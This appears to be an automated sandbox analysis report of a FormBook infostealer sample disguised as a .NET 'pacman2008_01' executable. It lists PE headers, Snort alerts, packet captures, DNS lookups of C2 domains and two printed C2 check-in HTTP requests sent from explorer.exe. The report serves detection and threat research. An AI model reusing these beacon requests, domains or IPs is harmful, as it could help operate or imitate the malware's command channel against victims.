add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x128b78	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x12c000	0xd624	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x12a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x126bd8	0x126c00	False	0.772728477523	data	7.81629816462	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.reloc	0x12a000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x12c000	0xd624	0xd800	False	0.708369502315	data	6.65420383784	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x12c2b0	0x2e8	data
RT_ICON	0x12c598	0x128	GLS_BINARY_LSB_FIRST
RT_ICON	0x12c6c0	0xea8	data
RT_ICON	0x12d568	0x8a8	data
RT_ICON	0x12de10	0x568	GLS_BINARY_LSB_FIRST
RT_ICON	0x12e378	0x7228	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON	0x1355a0	0x25a8	data
RT_ICON	0x137b48	0x10a8	data
RT_ICON	0x138bf0	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x139058	0x84	data
RT_VERSION	0x1390dc	0x394	data
RT_MANIFEST	0x139470	0x1b4	XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright Casper College 2009
Assembly Version	1.0.0.0
InternalName	ObjectEqualityCompar.exe
FileVersion	1.0.0.0
CompanyName	Casper College
LegalTrademarks
Comments
ProductName	pacman2008_01
ProductVersion	1.0.0.0
FileDescription	pacman2008_01
OriginalFilename	ObjectEqualityCompar.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
08/03/21-18:07:17.797781	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49731	80	192.168.2.6	34.102.136.180
08/03/21-18:07:17.797781	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49731	80	192.168.2.6	34.102.136.180
08/03/21-18:07:17.797781	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49731	80	192.168.2.6	34.102.136.180
08/03/21-18:07:17.910999	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49731	34.102.136.180	192.168.2.6
08/03/21-18:07:28.559363	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49734	34.102.136.180	192.168.2.6
08/03/21-18:07:34.070441	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49737	104.168.135.142	192.168.2.6
08/03/21-18:08:13.546886	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49750	185.53.177.11	192.168.2.6

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 18:07:12.445143938 CEST	49730	80	192.168.2.6	74.206.228.78
Aug 3, 2021 18:07:12.545701981 CEST	80	49730	74.206.228.78	192.168.2.6
Aug 3, 2021 18:07:12.545824051 CEST	49730	80	192.168.2.6	74.206.228.78
Aug 3, 2021 18:07:12.548222065 CEST	49730	80	192.168.2.6	74.206.228.78
Aug 3, 2021 18:07:12.649085045 CEST	80	49730	74.206.228.78	192.168.2.6
Aug 3, 2021 18:07:12.649118900 CEST	80	49730	74.206.228.78	192.168.2.6
Aug 3, 2021 18:07:12.649133921 CEST	80	49730	74.206.228.78	192.168.2.6
Aug 3, 2021 18:07:12.650379896 CEST	49730	80	192.168.2.6	74.206.228.78
Aug 3, 2021 18:07:12.726532936 CEST	49730	80	192.168.2.6	74.206.228.78
Aug 3, 2021 18:07:12.827085972 CEST	80	49730	74.206.228.78	192.168.2.6
Aug 3, 2021 18:07:17.778707027 CEST	49731	80	192.168.2.6	34.102.136.180
Aug 3, 2021 18:07:17.797241926 CEST	80	49731	34.102.136.180	192.168.2.6
Aug 3, 2021 18:07:17.797421932 CEST	49731	80	192.168.2.6	34.102.136.180
Aug 3, 2021 18:07:17.797780991 CEST	49731	80	192.168.2.6	34.102.136.180
Aug 3, 2021 18:07:17.815226078 CEST	80	49731	34.102.136.180	192.168.2.6
Aug 3, 2021 18:07:17.910999060 CEST	80	49731	34.102.136.180	192.168.2.6
Aug 3, 2021 18:07:17.911026955 CEST	80	49731	34.102.136.180	192.168.2.6
Aug 3, 2021 18:07:17.911591053 CEST	49731	80	192.168.2.6	34.102.136.180
Aug 3, 2021 18:07:17.911783934 CEST	49731	80	192.168.2.6	34.102.136.180
Aug 3, 2021 18:07:18.217406988 CEST	49731	80	192.168.2.6	34.102.136.180
Aug 3, 2021 18:07:18.234983921 CEST	80	49731	34.102.136.180	192.168.2.6
Aug 3, 2021 18:07:22.978722095 CEST	49732	80	192.168.2.6	184.168.131.241
Aug 3, 2021 18:07:23.147085905 CEST	80	49732	184.168.131.241	192.168.2.6
Aug 3, 2021 18:07:23.147264957 CEST	49732	80	192.168.2.6	184.168.131.241
Aug 3, 2021 18:07:23.147452116 CEST	49732	80	192.168.2.6	184.168.131.241
Aug 3, 2021 18:07:23.315705061 CEST	80	49732	184.168.131.241	192.168.2.6
Aug 3, 2021 18:07:23.338002920 CEST	80	49732	184.168.131.241	192.168.2.6
Aug 3, 2021 18:07:23.338038921 CEST	80	49732	184.168.131.241	192.168.2.6
Aug 3, 2021 18:07:23.338474989 CEST	49732	80	192.168.2.6	184.168.131.241
Aug 3, 2021 18:07:23.338501930 CEST	49732	80	192.168.2.6	184.168.131.241
Aug 3, 2021 18:07:23.507013083 CEST	80	49732	184.168.131.241	192.168.2.6
Aug 3, 2021 18:07:28.428195000 CEST	49734	80	192.168.2.6	34.102.136.180
Aug 3, 2021 18:07:28.445549965 CEST	80	49734	34.102.136.180	192.168.2.6
Aug 3, 2021 18:07:28.445682049 CEST	49734	80	192.168.2.6	34.102.136.180
Aug 3, 2021 18:07:28.445873022 CEST	49734	80	192.168.2.6	34.102.136.180
Aug 3, 2021 18:07:28.463072062 CEST	80	49734	34.102.136.180	192.168.2.6
Aug 3, 2021 18:07:28.559362888 CEST	80	49734	34.102.136.180	192.168.2.6
Aug 3, 2021 18:07:28.559396982 CEST	80	49734	34.102.136.180	192.168.2.6
Aug 3, 2021 18:07:28.559622049 CEST	49734	80	192.168.2.6	34.102.136.180
Aug 3, 2021 18:07:28.559803963 CEST	49734	80	192.168.2.6	34.102.136.180
Aug 3, 2021 18:07:28.577097893 CEST	80	49734	34.102.136.180	192.168.2.6
Aug 3, 2021 18:07:33.666811943 CEST	49737	80	192.168.2.6	104.168.135.142
Aug 3, 2021 18:07:33.868405104 CEST	80	49737	104.168.135.142	192.168.2.6
Aug 3, 2021 18:07:33.871331930 CEST	49737	80	192.168.2.6	104.168.135.142
Aug 3, 2021 18:07:33.871361971 CEST	49737	80	192.168.2.6	104.168.135.142
Aug 3, 2021 18:07:34.070441008 CEST	80	49737	104.168.135.142	192.168.2.6
Aug 3, 2021 18:07:34.070471048 CEST	80	49737	104.168.135.142	192.168.2.6
Aug 3, 2021 18:07:34.135035992 CEST	49737	80	192.168.2.6	104.168.135.142
Aug 3, 2021 18:07:34.135083914 CEST	49737	80	192.168.2.6	104.168.135.142
Aug 3, 2021 18:07:34.341749907 CEST	80	49737	104.168.135.142	192.168.2.6
Aug 3, 2021 18:07:39.562280893 CEST	49740	80	192.168.2.6	107.165.13.75
Aug 3, 2021 18:07:39.742598057 CEST	80	49740	107.165.13.75	192.168.2.6
Aug 3, 2021 18:07:39.742865086 CEST	49740	80	192.168.2.6	107.165.13.75
Aug 3, 2021 18:07:39.743015051 CEST	49740	80	192.168.2.6	107.165.13.75
Aug 3, 2021 18:07:39.920809031 CEST	80	49740	107.165.13.75	192.168.2.6
Aug 3, 2021 18:07:39.921076059 CEST	80	49740	107.165.13.75	192.168.2.6
Aug 3, 2021 18:07:39.921245098 CEST	49740	80	192.168.2.6	107.165.13.75
Aug 3, 2021 18:07:39.921302080 CEST	49740	80	192.168.2.6	107.165.13.75
Aug 3, 2021 18:07:40.097760916 CEST	80	49740	107.165.13.75	192.168.2.6
Aug 3, 2021 18:07:45.040502071 CEST	49741	80	192.168.2.6	112.213.96.11
Aug 3, 2021 18:07:45.303658962 CEST	80	49741	112.213.96.11	192.168.2.6
Aug 3, 2021 18:07:45.811259985 CEST	49741	80	192.168.2.6	112.213.96.11
Aug 3, 2021 18:07:46.078480959 CEST	80	49741	112.213.96.11	192.168.2.6
Aug 3, 2021 18:07:46.589906931 CEST	49741	80	192.168.2.6	112.213.96.11
Aug 3, 2021 18:07:46.852190018 CEST	80	49741	112.213.96.11	192.168.2.6
Aug 3, 2021 18:07:50.658178091 CEST	49747	80	192.168.2.6	112.213.96.11
Aug 3, 2021 18:07:50.931644917 CEST	80	49747	112.213.96.11	192.168.2.6
Aug 3, 2021 18:07:51.453933954 CEST	49747	80	192.168.2.6	112.213.96.11
Aug 3, 2021 18:07:51.700221062 CEST	80	49747	112.213.96.11	192.168.2.6
Aug 3, 2021 18:07:52.204119921 CEST	49747	80	192.168.2.6	112.213.96.11
Aug 3, 2021 18:07:52.449719906 CEST	80	49747	112.213.96.11	192.168.2.6
Aug 3, 2021 18:07:57.143922091 CEST	49748	80	192.168.2.6	45.39.95.186
Aug 3, 2021 18:07:57.325524092 CEST	80	49748	45.39.95.186	192.168.2.6
Aug 3, 2021 18:07:57.327033043 CEST	49748	80	192.168.2.6	45.39.95.186
Aug 3, 2021 18:07:57.333901882 CEST	49748	80	192.168.2.6	45.39.95.186
Aug 3, 2021 18:07:57.515420914 CEST	80	49748	45.39.95.186	192.168.2.6
Aug 3, 2021 18:07:57.519463062 CEST	80	49748	45.39.95.186	192.168.2.6
Aug 3, 2021 18:07:57.519486904 CEST	80	49748	45.39.95.186	192.168.2.6
Aug 3, 2021 18:07:57.532351971 CEST	49748	80	192.168.2.6	45.39.95.186
Aug 3, 2021 18:07:57.532391071 CEST	49748	80	192.168.2.6	45.39.95.186
Aug 3, 2021 18:07:57.715282917 CEST	80	49748	45.39.95.186	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 18:05:52.724442005 CEST	60342	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:05:52.752726078 CEST	53	60342	8.8.8.8	192.168.2.6
Aug 3, 2021 18:05:53.505026102 CEST	61346	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:05:53.529517889 CEST	53	61346	8.8.8.8	192.168.2.6
Aug 3, 2021 18:05:54.296546936 CEST	51774	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:05:54.322283030 CEST	53	51774	8.8.8.8	192.168.2.6
Aug 3, 2021 18:05:55.081458092 CEST	56023	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:05:55.109167099 CEST	53	56023	8.8.8.8	192.168.2.6
Aug 3, 2021 18:05:55.708447933 CEST	58384	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:05:55.741029978 CEST	53	58384	8.8.8.8	192.168.2.6
Aug 3, 2021 18:05:56.529664040 CEST	60261	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:05:56.565063000 CEST	53	60261	8.8.8.8	192.168.2.6
Aug 3, 2021 18:05:57.260680914 CEST	56061	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:05:57.286715031 CEST	53	56061	8.8.8.8	192.168.2.6
Aug 3, 2021 18:05:57.942817926 CEST	58336	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:05:57.968656063 CEST	53	58336	8.8.8.8	192.168.2.6
Aug 3, 2021 18:05:58.943890095 CEST	53781	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:05:58.978369951 CEST	53	53781	8.8.8.8	192.168.2.6
Aug 3, 2021 18:06:00.243257999 CEST	54064	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:06:00.276106119 CEST	53	54064	8.8.8.8	192.168.2.6
Aug 3, 2021 18:06:01.416224003 CEST	52811	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:06:01.451419115 CEST	53	52811	8.8.8.8	192.168.2.6
Aug 3, 2021 18:06:02.738663912 CEST	55299	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:06:02.764319897 CEST	53	55299	8.8.8.8	192.168.2.6
Aug 3, 2021 18:06:03.569411993 CEST	63745	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:06:03.595031977 CEST	53	63745	8.8.8.8	192.168.2.6
Aug 3, 2021 18:06:04.382529020 CEST	50055	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:06:04.411349058 CEST	53	50055	8.8.8.8	192.168.2.6
Aug 3, 2021 18:06:05.236265898 CEST	61374	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:06:05.270332098 CEST	53	61374	8.8.8.8	192.168.2.6
Aug 3, 2021 18:06:06.276887894 CEST	50339	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:06:06.309447050 CEST	53	50339	8.8.8.8	192.168.2.6
Aug 3, 2021 18:06:19.918977022 CEST	63307	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:06:19.973263025 CEST	53	63307	8.8.8.8	192.168.2.6
Aug 3, 2021 18:06:57.880218983 CEST	49694	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:06:57.912908077 CEST	53	49694	8.8.8.8	192.168.2.6
Aug 3, 2021 18:07:03.642384052 CEST	54982	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:07:03.685367107 CEST	53	54982	8.8.8.8	192.168.2.6
Aug 3, 2021 18:07:11.220751047 CEST	50010	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:07:12.234323025 CEST	50010	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:07:12.437820911 CEST	53	50010	8.8.8.8	192.168.2.6
Aug 3, 2021 18:07:12.437886000 CEST	53	50010	8.8.8.8	192.168.2.6
Aug 3, 2021 18:07:17.741252899 CEST	63718	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:07:17.776156902 CEST	53	63718	8.8.8.8	192.168.2.6
Aug 3, 2021 18:07:22.926110983 CEST	62116	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:07:22.973524094 CEST	53	62116	8.8.8.8	192.168.2.6
Aug 3, 2021 18:07:28.378511906 CEST	63816	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:07:28.426587105 CEST	53	63816	8.8.8.8	192.168.2.6
Aug 3, 2021 18:07:30.276173115 CEST	55014	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:07:30.320292950 CEST	53	55014	8.8.8.8	192.168.2.6
Aug 3, 2021 18:07:33.568135977 CEST	62208	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:07:33.662112951 CEST	53	62208	8.8.8.8	192.168.2.6
Aug 3, 2021 18:07:35.600363016 CEST	57574	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:07:35.650856972 CEST	53	57574	8.8.8.8	192.168.2.6
Aug 3, 2021 18:07:39.115410089 CEST	51818	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:07:39.550025940 CEST	53	51818	8.8.8.8	192.168.2.6
Aug 3, 2021 18:07:44.992660046 CEST	56628	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:07:45.027869940 CEST	53	56628	8.8.8.8	192.168.2.6
Aug 3, 2021 18:07:46.608277082 CEST	60778	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:07:46.655467987 CEST	53	60778	8.8.8.8	192.168.2.6
Aug 3, 2021 18:07:47.579490900 CEST	53799	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:07:47.619427919 CEST	53	53799	8.8.8.8	192.168.2.6
Aug 3, 2021 18:07:50.571274996 CEST	54683	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:07:50.635329008 CEST	53	54683	8.8.8.8	192.168.2.6
Aug 3, 2021 18:07:51.863919020 CEST	59329	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:07:51.926891088 CEST	53	59329	8.8.8.8	192.168.2.6
Aug 3, 2021 18:07:56.952785969 CEST	64021	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:07:57.142524004 CEST	53	64021	8.8.8.8	192.168.2.6
Aug 3, 2021 18:08:08.066272974 CEST	56129	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:08:08.105159044 CEST	53	56129	8.8.8.8	192.168.2.6
Aug 3, 2021 18:08:13.457308054 CEST	58177	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:08:13.495903015 CEST	53	58177	8.8.8.8	192.168.2.6
Aug 3, 2021 18:08:16.292586088 CEST	50700	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:08:16.351644993 CEST	53	50700	8.8.8.8	192.168.2.6
Aug 3, 2021 18:08:17.017051935 CEST	54069	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:08:17.053416014 CEST	61178	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:08:17.067125082 CEST	53	54069	8.8.8.8	192.168.2.6
Aug 3, 2021 18:08:17.100143909 CEST	53	61178	8.8.8.8	192.168.2.6
Aug 3, 2021 18:08:17.576842070 CEST	57017	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:08:17.615411997 CEST	53	57017	8.8.8.8	192.168.2.6
Aug 3, 2021 18:08:18.074498892 CEST	56327	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:08:18.106842995 CEST	53	56327	8.8.8.8	192.168.2.6
Aug 3, 2021 18:08:18.559139967 CEST	50243	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:08:18.709767103 CEST	62055	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:08:18.750322104 CEST	53	62055	8.8.8.8	192.168.2.6
Aug 3, 2021 18:08:18.765559912 CEST	53	50243	8.8.8.8	192.168.2.6
Aug 3, 2021 18:08:19.477304935 CEST	61249	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:08:19.512545109 CEST	53	61249	8.8.8.8	192.168.2.6
Aug 3, 2021 18:08:20.044338942 CEST	65252	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:08:20.078458071 CEST	53	65252	8.8.8.8	192.168.2.6
Aug 3, 2021 18:08:20.484458923 CEST	64367	53	192.168.2.6	8.8.8.8
Aug 3, 2021 18:08:20.511262894 CEST	53	64367	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 3, 2021 18:07:11.220751047 CEST	192.168.2.6	8.8.8.8	0x8498	Standard query (0)	www.regarta.com	A (IP address)	IN (0x0001)
Aug 3, 2021 18:07:12.234323025 CEST	192.168.2.6	8.8.8.8	0x8498	Standard query (0)	www.regarta.com	A (IP address)	IN (0x0001)
Aug 3, 2021 18:07:17.741252899 CEST	192.168.2.6	8.8.8.8	0x5fe7	Standard query (0)	www.tapdaugusta.com	A (IP address)	IN (0x0001)
Aug 3, 2021 18:07:22.926110983 CEST	192.168.2.6	8.8.8.8	0xa868	Standard query (0)	www.profitsnavigator.com	A (IP address)	IN (0x0001)
Aug 3, 2021 18:07:28.378511906 CEST	192.168.2.6	8.8.8.8	0x161c	Standard query (0)	www.konversationswithkoshie.net	A (IP address)	IN (0x0001)
Aug 3, 2021 18:07:33.568135977 CEST	192.168.2.6	8.8.8.8	0x606e	Standard query (0)	www.advancedautorepairsonline.com	A (IP address)	IN (0x0001)
Aug 3, 2021 18:07:39.115410089 CEST	192.168.2.6	8.8.8.8	0xd3fb	Standard query (0)	www.lovertons.com	A (IP address)	IN (0x0001)
Aug 3, 2021 18:07:44.992660046 CEST	192.168.2.6	8.8.8.8	0x7a1f	Standard query (0)	www.sdmdwang.com	A (IP address)	IN (0x0001)
Aug 3, 2021 18:07:50.571274996 CEST	192.168.2.6	8.8.8.8	0xf741	Standard query (0)	www.sdmdwang.com	A (IP address)	IN (0x0001)
Aug 3, 2021 18:07:51.863919020 CEST	192.168.2.6	8.8.8.8	0x41dc	Standard query (0)	www.sunilpsingh.com	A (IP address)	IN (0x0001)
Aug 3, 2021 18:07:56.952785969 CEST	192.168.2.6	8.8.8.8	0xa4fd	Standard query (0)	www.utformehagen.com	A (IP address)	IN (0x0001)
Aug 3, 2021 18:08:08.066272974 CEST	192.168.2.6	8.8.8.8	0x71f3	Standard query (0)	www.panyu-qqbaby.com	A (IP address)	IN (0x0001)
Aug 3, 2021 18:08:13.457308054 CEST	192.168.2.6	8.8.8.8	0x8a04	Standard query (0)	www.nicolettejohnsonphotography.com	A (IP address)	IN (0x0001)
Aug 3, 2021 18:08:18.559139967 CEST	192.168.2.6	8.8.8.8	0x2aef	Standard query (0)	www.kitkatmp3.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 3, 2021 18:07:12.437820911 CEST	8.8.8.8	192.168.2.6	0x8498	No error (0)	www.regarta.com		74.206.228.78	A (IP address)	IN (0x0001)
Aug 3, 2021 18:07:12.437820911 CEST	8.8.8.8	192.168.2.6	0x8498	No error (0)	www.regarta.com		173.239.5.6	A (IP address)	IN (0x0001)
Aug 3, 2021 18:07:12.437820911 CEST	8.8.8.8	192.168.2.6	0x8498	No error (0)	www.regarta.com		173.239.8.164	A (IP address)	IN (0x0001)
Aug 3, 2021 18:07:12.437886000 CEST	8.8.8.8	192.168.2.6	0x8498	No error (0)	www.regarta.com		74.206.228.78	A (IP address)	IN (0x0001)
Aug 3, 2021 18:07:12.437886000 CEST	8.8.8.8	192.168.2.6	0x8498	No error (0)	www.regarta.com		173.239.5.6	A (IP address)	IN (0x0001)
Aug 3, 2021 18:07:12.437886000 CEST	8.8.8.8	192.168.2.6	0x8498	No error (0)	www.regarta.com		173.239.8.164	A (IP address)	IN (0x0001)
Aug 3, 2021 18:07:17.776156902 CEST	8.8.8.8	192.168.2.6	0x5fe7	No error (0)	www.tapdaugusta.com	tapdaugusta.com		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 18:07:17.776156902 CEST	8.8.8.8	192.168.2.6	0x5fe7	No error (0)	tapdaugusta.com		34.102.136.180	A (IP address)	IN (0x0001)
Aug 3, 2021 18:07:22.973524094 CEST	8.8.8.8	192.168.2.6	0xa868	No error (0)	www.profitsnavigator.com	profitsnavigator.com		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 18:07:22.973524094 CEST	8.8.8.8	192.168.2.6	0xa868	No error (0)	profitsnavigator.com		184.168.131.241	A (IP address)	IN (0x0001)
Aug 3, 2021 18:07:28.426587105 CEST	8.8.8.8	192.168.2.6	0x161c	No error (0)	www.konversationswithkoshie.net	konversationswithkoshie.net		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 18:07:28.426587105 CEST	8.8.8.8	192.168.2.6	0x161c	No error (0)	konversationswithkoshie.net		34.102.136.180	A (IP address)	IN (0x0001)
Aug 3, 2021 18:07:33.662112951 CEST	8.8.8.8	192.168.2.6	0x606e	No error (0)	www.advancedautorepairsonline.com		104.168.135.142	A (IP address)	IN (0x0001)
Aug 3, 2021 18:07:39.550025940 CEST	8.8.8.8	192.168.2.6	0xd3fb	No error (0)	www.lovertons.com		107.165.13.75	A (IP address)	IN (0x0001)
Aug 3, 2021 18:07:45.027869940 CEST	8.8.8.8	192.168.2.6	0x7a1f	No error (0)	www.sdmdwang.com		112.213.96.11	A (IP address)	IN (0x0001)
Aug 3, 2021 18:07:50.635329008 CEST	8.8.8.8	192.168.2.6	0xf741	No error (0)	www.sdmdwang.com		112.213.96.11	A (IP address)	IN (0x0001)
Aug 3, 2021 18:07:51.926891088 CEST	8.8.8.8	192.168.2.6	0x41dc	Server failure (2)	www.sunilpsingh.com	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 18:07:57.142524004 CEST	8.8.8.8	192.168.2.6	0xa4fd	No error (0)	www.utformehagen.com		45.39.95.186	A (IP address)	IN (0x0001)
Aug 3, 2021 18:08:08.105159044 CEST	8.8.8.8	192.168.2.6	0x71f3	No error (0)	www.panyu-qqbaby.com	panyu-qqbaby.com		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 18:08:08.105159044 CEST	8.8.8.8	192.168.2.6	0x71f3	No error (0)	panyu-qqbaby.com		107.160.109.196	A (IP address)	IN (0x0001)
Aug 3, 2021 18:08:13.495903015 CEST	8.8.8.8	192.168.2.6	0x8a04	No error (0)	www.nicolettejohnsonphotography.com		185.53.177.11	A (IP address)	IN (0x0001)
Aug 3, 2021 18:08:18.765559912 CEST	8.8.8.8	192.168.2.6	0x2aef	No error (0)	www.kitkatmp3.com		156.224.60.3	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.regarta.com

www.tapdaugusta.com

www.profitsnavigator.com

www.konversationswithkoshie.net

www.advancedautorepairsonline.com

www.lovertons.com

www.utformehagen.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49730	74.206.228.78	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 18:07:12.548222065 CEST	3920	OUT	GET /weni/?Fzr4otMh=vK5NYeOz5XkzOmNWKQvXOgoJo3oDs/IT/QpSrvoL9TxdOASFPAP+KPQhIJ5bhzx72Ujc1GJYaw==&aRbdj=q6AlsppXkR0txTj HTTP/1.1 Host: www.regarta.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 3, 2021 18:07:12.649118900 CEST	3920	IN	HTTP/1.1 302 Moved Temporarily Server: nginx/1.18.0 Date: Tue, 03 Aug 2021 16:07:12 GMT Content-Type: text/html Content-Length: 145 Connection: close Location: http://www.regarta.com/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx/1.18.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49731	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 18:07:17.797780991 CEST	3921	OUT	GET /weni/?Fzr4otMh=5QGyFhC7d8SOfupCgf8D8L5Dw1IpKGdMSRgbjgwl2q0Kak4r1qcSYI6TGyMZI/ki/MDg/v9Fdw==&aRbdj=q6AlsppXkR0txTj HTTP/1.1 Host: www.tapdaugusta.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
